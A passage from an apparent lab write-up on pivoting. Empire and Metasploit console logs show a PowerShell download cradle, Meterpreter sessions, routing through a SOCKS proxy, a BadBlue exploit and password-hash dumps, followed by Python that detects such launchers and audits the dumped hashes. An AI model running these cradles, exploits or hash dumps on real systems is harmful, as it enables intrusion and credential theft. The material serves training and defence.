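"""Flag encoded, hidden-window PowerShell launchers in process-creation logs.

Added example, not part of the original lab write-up or of Empire/Metasploit.
The events in SAMPLE_EVENTS are constructed (PIDs and users are made up); the
cradle text mirrors the shape of a web_delivery launcher with the lab's URL.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

CRADLE_MARKERS = ("net.webclient", "downloadstring", "downloadfile", "invoke-expression",
                  "iex", "frombase64string", "http://", "https://")
ALERT_THRESHOLD = 3


def _is_prefix_of(token: str, full: str, min_len: int) -> bool:
    """powershell.exe accepts any unambiguous prefix of a switch: -enc, -noP, -w."""
    t = token.lower().lstrip("-")
    return len(t) >= min_len and full.startswith(t)


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries Base64 over UTF-16LE text; return None if it is not."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16-le", errors="replace")


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Score one command line: encoded (+1), hidden window (+1), no profile (+1), cradle (+2)."""
    tokens = cmdline.split()
    result: Dict[str, object] = {"encoded": False, "hidden": False, "noprofile": False,
                                 "cradle": False, "decoded": None, "score": 0}
    if not tokens or not re.search(r"(^|\\)(powershell|pwsh)(\.exe)?$", tokens[0], re.I):
        return result
    for i, tok in enumerate(tokens[1:], 1):
        if not tok.startswith("-"):
            continue
        if _is_prefix_of(tok, "encodedcommand", 1) and i + 1 < len(tokens):
            result["encoded"] = True
            result["decoded"] = decode_encoded_command(tokens[i + 1])
        elif (_is_prefix_of(tok, "windowstyle", 1) and i + 1 < len(tokens)
              and tokens[i + 1].lower() in ("hidden", "1")):
            result["hidden"] = True
        elif _is_prefix_of(tok, "noprofile", 3):
            result["noprofile"] = True
    decoded = result["decoded"]
    if isinstance(decoded, str):
        low = decoded.lower()
        result["cradle"] = any(marker in low for marker in CRADLE_MARKERS)
    result["score"] = (int(result["encoded"]) + int(result["hidden"])
                       + int(result["noprofile"]) + 2 * int(result["cradle"]))
    return result


def triage(events: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the events worth alerting on, annotated with the analysis."""
    alerts = []
    for ev in events:
        r = analyze_command_line(str(ev["cmdline"]))
        if int(r["score"]) >= ALERT_THRESHOLD:
            alerts.append({"pid": ev["pid"], "user": ev["user"], **r})
    return alerts


def encode_ps(text: str) -> str:
    """Encode text the way -EncodedCommand expects (used only to build samples)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon-style events. Event 1 has the Empire launcher shape, event 2
# the web_delivery shape, events 3 and 4 are ordinary admin usage.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.2:8080/ih5YT1w')"
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 5120, "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "powershell -noP -sta -w 1 -enc " + encode_ps(CRADLE)},
    {"pid": 5204, "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "powershell.exe -nop -w hidden -e " + encode_ps(CRADLE)},
    {"pid": 5310, "user": "ATTACKDEFENSE\\local_admin",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"pid": 5388, "user": "ATTACKDEFENSE\\local_admin",
     "cmdline": "powershell.exe -EncodedCommand " + encode_ps("Get-Process | Out-File C:\\temp\\procs.txt")},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"pid {a['pid']} ({a['user']}) score={a['score']} decoded={a['decoded']!r}")
```

Scoring rather than matching a single flag keeps the false-positive rate down: a plain `-EncodedCommand` with a benign decoded body (event 4) stays below the threshold, while either launcher shape from this lab scores 5. Note also that both launchers here ran as SYSTEM because the stager was executed from the smbexec shell; a SYSTEM-owned PowerShell whose parent is a service-created process is itself a strong signal worth adding to the score.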
```
(Empire: W3986BFX) > usemodule powershell/code_execution/invoke_metasploitpayload
[*] Set Agent to W3986BFX
Author @jaredhaight
Background False
Comments https://github.com/jaredhaight/Invoke-MetasploitPayload/
Description Spawns a new, hidden PowerShell window that downloadsand executes a
Metasploit payload. This relies on
theexploit/multi/scripts/web_delivery metasploit module.
Language powershell
Name powershell/code_execution/invoke_metasploitpayload
NeedsAdmin False
OpsecSafe True
Techniques http://attack.mitre.org/techniques/T1055
┌Record Options────┬──────────┬─────────────────────────────────────┐
│ Name │ Value │ Required │ Description │
├───────┼──────────┼──────────┼─────────────────────────────────────┤
│ Agent │ W3986BFX │ True │ Agent to run Metasploit payload on. │
├───────┼──────────┼──────────┼─────────────────────────────────────┤
│ URL │ │ True │ URL from the Metasploit │
│ │ │ │ web_delivery module │
└───────┴──────────┴──────────┴─────────────────────────────────────┘
(Empire: usemodule/powershell/code_execution/invoke_metasploitpayload) > set URL http://10.10.16.2:8080/ih5YT1w
[*] Set URL to http://10.10.16.2:8080/ih5YT1w
(Empire: usemodule/powershell/code_execution/invoke_metasploitpayload) > execute
[*] Tasked W3986BFX to run Task 4
(Empire: W3986BFX) >
```
```
msf6 exploit(multi/script/web_delivery) > [*] 10.0.26.27 web_delivery - Delivering Payload (3520 bytes)
[*] Sending stage (175174 bytes) to 10.0.26.27
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.0.26.27:49468 ) at 2024-06-15 16:10:34 +0530
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ ATTACKDEFENSE 10.10.16.2:4444 -> 10.0.26.27:49468 (10.0.26.27)
msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Background session 1? [y/N]
```
```
msf6 exploit(multi/script/web_delivery) > search autoroute
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/manage/autoroute normal No Multi Manage Network Route via Meterpreter Session
Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/autoroute
msf6 exploit(multi/script/web_delivery) > use 0
msf6 post(multi/manage/autoroute) > show options
Module options (post/multi/manage/autoroute):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
SESSION yes The session to run this module on
SUBNET no Subnet (IPv4, for example, 10.10.10.0)
msf6 post(multi/manage/autoroute) > set SESSION 1
SESSION => 1
msf6 post(multi/manage/autoroute) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running module against ATTACKDEFENSE
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.16.0/255.255.240.0 from host's routing table.
[*] Post module execution completed
```
```
msf6 post(multi/manage/autoroute) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set SRVHOST 10.10.16.2
SRVHOST => 10.10.16.2
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 2.
[*] Starting the SOCKS proxy server
```
In Firefox's Network Settings, choose Manual proxy configuration, set SOCKS Host to 10.10.16.2 (Kali) and Port to 1080.
Then browse to fileServer.ine.local and the BadBlue page is displayed.
```
msf6 exploit(windows/http/badblue_passthru) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/http/badblue_passthru) > show options
Module options (exploit/windows/http/badblue_passthru):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.20.241 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 8848 yes The listen port
RHOST 10.0.20.241 no The target address
Exploit target:
Id Name
-- ----
1 BadBlue 2.72b Universal
msf6 exploit(windows/http/badblue_passthru) > run
[*] Trying target BadBlue 2.72b Universal...
[*] Started bind TCP handler against 10.0.20.241:8848
[*] Sending stage (175174 bytes) to 10.0.20.241
[*] Meterpreter session 2 opened (10.0.26.27:49715 -> 10.0.20.241:8848 via session 1) at 2024-06-15 16:56:42 +0530
meterpreter > sysinfo
Computer : ATTACKDEFENSE
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: ATTACKDEFENSE\Administrator
meterpreter > cat c:\\flag.txt
c46d12f28d87ae0b92b05ebd9fb8e817
```
```
meterpreter >
Background session 2? [y/N]
msf6 exploit(windows/http/badblue_passthru) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows NT AUTHORITY\SYSTEM @ ATTACKDEFENSE 10.10.16.2:4444 -> 10.0.26.27:49468 (10.0.26.27)
2 meterpreter x86/windows ATTACKDEFENSE\Administrator @ ATTACKDEFENSE 10.0.26.27:49715 -> 10.0.20.241:8848 via session 1 (10.0.20.241)
```
```
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 37cbff09ae8a6e2a3db546e135ca4650...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
local_admin:"yes"
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
local_admin:1009:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd:::
meterpreter >
Background session 1? [y/N]
```
```
msf6 exploit(windows/http/badblue_passthru) > sessions 2
[*] Starting interaction with 2...
meterpreter > use priv
[!] The "priv" extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 377af0de68bdc918d22c57a263d38326...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::
```
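Read side by side, the two hashdump results above (from demo.ine.local and from fileServer.ine.local) tell the defender more than the flag does: the local Administrator NT hash `5c4d5939...` is identical on both hosts, which is exactly the shared-local-admin-password condition that let one credential open both machines, and several accounts carry the well-known empty-password NT hash `31d6cfe0...`. The following is an added example, not part of the original write-up, that audits pwdump-style output from several hosts for these conditions. The hash lines are copied from the output above; nothing else is assumed.

```python
"""Audit pwdump-style hash output from several hosts for weak and shared local passwords.

Added example, not part of the original lab write-up. The two dumps are the
hashdump results shown above; the two sentinel hashes are public constants
(LM "no password"/disabled and NT hash of the empty string).
"""
from typing import Dict, List

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hashing disabled / no LM hash stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

# Copied from the lab's hashdump output (demo.ine.local and fileServer.ine.local).
DUMPS = {
    "10.0.26.27": """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
local_admin:1009:aad3b435b51404eeaad3b435b51404ee:89551acff8895768e489bb3054af94fd:::
""",
    "10.0.20.241": """
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c4d59391f656d5958dab124ffeabc20:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
student:1008:aad3b435b51404eeaad3b435b51404ee:bd4ca1fbe028f3c5066467a7f6a73b0b:::
""",
}


def parse_pwdump(text: str) -> List[Dict[str, object]]:
    """Parse 'user:rid:lm:nt:::' lines; malformed lines are skipped."""
    entries = []
    for line in text.strip().splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append({"user": parts[0], "rid": int(parts[1]),
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def audit_hashes(dumps: Dict[str, str]) -> List[Dict[str, str]]:
    """Flag empty passwords, stored LM hashes, and the same password reused across hosts."""
    findings: List[Dict[str, str]] = []
    by_host = {host: parse_pwdump(text) for host, text in dumps.items()}

    for host, entries in by_host.items():
        for e in entries:
            if e["nt"] == EMPTY_NT:
                findings.append({"host": host, "user": str(e["user"]),
                                 "issue": "empty password (confirm the account is disabled)"})
            if e["lm"] != EMPTY_LM:
                findings.append({"host": host, "user": str(e["user"]),
                                 "issue": "LM hash stored (NoLMHash policy not enforced)"})

    # Same account name with the same non-empty NT hash on more than one host
    # means one local password unlocks every one of those hosts.
    seen: Dict[tuple, List[str]] = {}
    for host, entries in by_host.items():
        for e in entries:
            if e["nt"] != EMPTY_NT:
                seen.setdefault((str(e["user"]), str(e["nt"])), []).append(host)
    for (user, _nt), hosts in seen.items():
        if len(hosts) > 1:
            findings.append({"host": ",".join(sorted(hosts)), "user": user,
                             "issue": "same password on multiple hosts (use LAPS or per-host passwords)"})
    return findings


if __name__ == "__main__":
    for f in audit_hashes(DUMPS):
        print(f"{f['host']:<24} {f['user']:<20} {f['issue']}")
```

On this pair of hosts the audit reports Guest on both machines and DefaultAccount on the fileserver with the empty-password hash (both are built-in and normally disabled, which is why the check says to confirm rather than to panic), no LM hashes, and the shared Administrator password across 10.0.26.27 and 10.0.20.241. That last finding is the one that matters: with a unique local Administrator password per host (LAPS does this automatically), the credential leaked by the scheduled-task script would have opened only the fileserver, not the pivot host as well.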